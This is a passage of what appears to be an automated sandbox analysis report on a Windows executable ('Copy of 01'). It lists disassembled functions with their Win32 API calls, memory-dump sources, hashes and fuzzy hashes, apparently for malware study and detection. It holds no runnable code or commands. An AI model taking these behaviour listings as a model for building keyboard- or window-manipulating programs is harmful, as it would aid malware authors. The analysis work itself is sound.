                        • _wcslen.LIBCMT ref: 003B4D59
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 003B4DCF
                        • CoTaskMemFree.OLE32(?), ref: 003B4DDA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 614568839-2785691316
                        • Opcode ID: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                        • Instruction ID: 2d0893a1946bb391a3cc08195c700352a46244aaad5167382d4d9677d11f03d3
                        • Opcode Fuzzy Hash: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                        • Instruction Fuzzy Hash: D8910771D0021DAFDF16DFA4D891EEEB7B8BF48314F10816AE915AB251DB709A44CFA0
                        Function 003C20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenu.USER32(?), ref: 003C2183
                        • GetMenuItemCount.USER32(00000000), ref: 003C21B5
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C21DD
                        • _wcslen.LIBCMT ref: 003C2213
                        • GetMenuItemID.USER32(?,?), ref: 003C224D
                        • GetSubMenu.USER32(?,?), ref: 003C225B
                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C22E3
                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                        • String ID:
                        • API String ID: 4196846111-0
                        • Opcode ID: 52b73704cce337d6cce7863278e9a2141caa89ee37395bb39383b871d87072ed
                        • Instruction ID: fa04670a1da774262168231863629c5162e7224012d9cfa02a18da1e1a34680d
                        • Opcode Fuzzy Hash: 52b73704cce337d6cce7863278e9a2141caa89ee37395bb39383b871d87072ed
                        • Instruction Fuzzy Hash: A5716C75A00205AFCB16EF69C885FAEB7F5EF48320F158859E816EB351DB34ED418B90
                        Function 0039AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(?), ref: 0039AEF9
                        • GetKeyboardState.USER32(?), ref: 0039AF0E
                        • SetKeyboardState.USER32(?), ref: 0039AF6F
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0039AF9D
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0039AFBC
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0039AFFD
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0039B020
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
                        • Instruction ID: 23c7e8563b71916482b1f8f02d03f38f79f0ae4027870af6171b6ca6929dc1e0
                        • Opcode Fuzzy Hash: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
                        • Instruction Fuzzy Hash: 5B51E4A0A04BD53DFF3743348D49BBABEE95B06304F098589E1DA858C2C3D8ACD8D791
                        Function 0039ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32(00000000), ref: 0039AD19
                        • GetKeyboardState.USER32(?), ref: 0039AD2E
                        • SetKeyboardState.USER32(?), ref: 0039AD8F
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0039ADBB
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0039ADD8
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0039AE17
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0039AE38
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
                        • Instruction ID: 61bfbadbc31200cdeb335b970cb3b50f459233702c2f4e4df2bcd7f31c4cdcf4
                        • Opcode Fuzzy Hash: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
                        • Instruction Fuzzy Hash: 2451F9A1904BD53DFF3783348C55B7ABED85B46300F098689E1D54A8C2D394EC94E7D2
                        Function 0036542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleCP.KERNEL32(00373CD6,?,?,?,?,?,?,?,?,00365BA3,?,?,00373CD6,?,?), ref: 00365470
                        • __fassign.LIBCMT ref: 003654EB
                        • __fassign.LIBCMT ref: 00365506
                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00373CD6,00000005,00000000,00000000), ref: 0036552C
                        • WriteFile.KERNEL32(?,00373CD6,00000000,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 0036554B
                        • WriteFile.KERNEL32(?,?,00000001,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 00365584
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
                        • Instruction ID: 57363828ab98470dbcc8f8342fbf873ca7d0acd6a340764332d6825521201b88
                        • Opcode Fuzzy Hash: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
                        • Instruction Fuzzy Hash: CB51D7719006499FDB12CFA8D845AEEBBF9EF0A300F14816EF556E7295D730EA41CB60
                        Function 003B10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                          • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B1112
                        • WSAGetLastError.WSOCK32 ref: 003B1121
                        • WSAGetLastError.WSOCK32 ref: 003B11C9
                        • closesocket.WSOCK32(00000000), ref: 003B11F9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 2675159561-0
                        • Opcode ID: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
                        • Instruction ID: 421ce458cd622659ae4b9b62277c96a2bf55275bbdc419495e67f1d6d85b1e93
                        • Opcode Fuzzy Hash: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
                        • Instruction Fuzzy Hash: AD41F431600204AFDB129F18C895BEAB7EDEF45328F148059FA09DF691C770AD41CBA0
                        Function 0039CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                        • lstrcmpiW.KERNEL32(?,?), ref: 0039CF45
                        • MoveFileW.KERNEL32(?,?), ref: 0039CF7F
                        • _wcslen.LIBCMT ref: 0039D005
                        • _wcslen.LIBCMT ref: 0039D01B
                        • SHFileOperationW.SHELL32(?), ref: 0039D061
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                        • String ID: \*.*
                        • API String ID: 3164238972-1173974218
                        • Opcode ID: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
                        • Instruction ID: 3e5067dad58adde2d689b9ec07a30cd6c448f047a3372c0ee08ce4558b599913
                        • Opcode Fuzzy Hash: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
                        • Instruction Fuzzy Hash: 894146719452199FDF13EBA4D982EDDB7B9AF08780F1110E6E509EB141EB34AA88CB50
                        Function 003C2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C2E1C
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E4F
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E84
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C2EB6
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C2EE0
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2EF1
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C2F0B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
                        • Instruction ID: 1a6ec41be08c7b3831b184fbbf6028170ff563e8e7f63c8e68294ff1ab73d986
                        • Opcode Fuzzy Hash: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
                        • Instruction Fuzzy Hash: 9D310330604254AFDB22DF68DD84FA637E5EB8A710F1A1168F944EF2B1CB71AC50DB41
                        Function 00397726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397769
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039778F
                        • SysAllocString.OLEAUT32(00000000), ref: 00397792
                        • SysAllocString.OLEAUT32(?), ref: 003977B0
                        • SysFreeString.OLEAUT32(?), ref: 003977B9
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003977DE
                        • SysAllocString.OLEAUT32(?), ref: 003977EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: 44b7591ad4a67a48abefda5c0b1693291b8f35ef558fb21c7efa686529117de4
                        • Instruction ID: 992593386b1421598b647c3897ad48920e74133e19bc6e0d91f92a9f684c1fcf
                        • Opcode Fuzzy Hash: 44b7591ad4a67a48abefda5c0b1693291b8f35ef558fb21c7efa686529117de4
                        • Instruction Fuzzy Hash: CB21A476614219AFDF12DFE9CC88CBB77ECEB09764B058025F915DB190D670EC428760
                        Function 003977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397842
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397868
                        • SysAllocString.OLEAUT32(00000000), ref: 0039786B
                        • SysAllocString.OLEAUT32 ref: 0039788C
                        • SysFreeString.OLEAUT32 ref: 00397895
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003978AF
                        • SysAllocString.OLEAUT32(?), ref: 003978BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        • Opcode ID: eef17449e3b443df78e067879885520f3f7cfeab2bed82742e0d233f6abec223
                        • Instruction ID: 7a30dbf98e9f68e905b984f348a5961cc03b3133ade18a5df7b37267447cb795
                        • Opcode Fuzzy Hash: eef17449e3b443df78e067879885520f3f7cfeab2bed82742e0d233f6abec223
                        • Instruction Fuzzy Hash: 8221A131618204AFDF12AFA9DC8DDAA77ECFB08360B158125F915CB2A1D670EC41CB64
                        Function 003A04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 003A04F2
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A052E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: 6c09959c0b8c78984bf53122f0720b363d1e44d1eb9541171b9120f8843b28a1
                        • Instruction ID: 924e94311298f20f006d8290e0ceade1920ec93d5608ee88c284543db78a5cb5
                        • Opcode Fuzzy Hash: 6c09959c0b8c78984bf53122f0720b363d1e44d1eb9541171b9120f8843b28a1
                        • Instruction Fuzzy Hash: C121AD74904305AFCF268F69DC04A9A7BB8EF47760F204A18F8A1E62E0E7709940CF20
                        Function 003A05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A0601
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: 26055a12a23f8b9dcb396ba40b76c9a9d051e44a297b115a18e991a0009b607e
                        • Instruction ID: 2c23718b8417d156d0247d305760a9a2b9638a28369c1aef33448ac4ee5a5238
                        • Opcode Fuzzy Hash: 26055a12a23f8b9dcb396ba40b76c9a9d051e44a297b115a18e991a0009b607e
                        • Instruction Fuzzy Hash: 0E2151755003059BDF2A9F69DC04E9A77E8FF97724F200A19F9A1E72E0E7709960CB10
                        Function 003C40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C4112
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C411F
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C412A
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C4139
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C4145
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: a2e7b312ffc019606bb6fd5fef9a524408aa79c669b6827d426a5ff594df6d8a
                        • Instruction ID: ef6462e361e760809eda076cc7dcc06c785776418d73c9f593e9131d5240f4fb
                        • Opcode Fuzzy Hash: a2e7b312ffc019606bb6fd5fef9a524408aa79c669b6827d426a5ff594df6d8a
                        • Instruction Fuzzy Hash: FC1190B2150219BEEF129F64CC86EE77F9DEF08798F014111FA18E6150C6729C219BA4
                        Function 0036D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0036D7A3: _free.LIBCMT ref: 0036D7CC
                        • _free.LIBCMT ref: 0036D82D
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036D838
                        • _free.LIBCMT ref: 0036D843
                        • _free.LIBCMT ref: 0036D897
                        • _free.LIBCMT ref: 0036D8A2
                        • _free.LIBCMT ref: 0036D8AD
                        • _free.LIBCMT ref: 0036D8B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                        • Instruction ID: c2a11515930ef6afda84cb06ec0ff2b28c70ed41142b46cb0cecea6bffa084aa
                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                        • Instruction Fuzzy Hash: B5115171B40B04AAD523BFB0CC47FCB7BDC6F42700F448825B299AE096DBA6B5154651
                        Function 0039DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0039DA74
                        • LoadStringW.USER32(00000000), ref: 0039DA7B
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0039DA91
                        • LoadStringW.USER32(00000000), ref: 0039DA98
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039DADC
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 0039DAB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 4072794657-3128320259
                        • Opcode ID: 8bb8c7effafcaf27d6e4565b1cf2f0eab070c751c806fda005aa5d79a824726e
                        • Instruction ID: 2b33e3ac8ee7768aa8920214ffbc85c21ea35e44ec9dedc91bb856ca44b66701
                        • Opcode Fuzzy Hash: 8bb8c7effafcaf27d6e4565b1cf2f0eab070c751c806fda005aa5d79a824726e
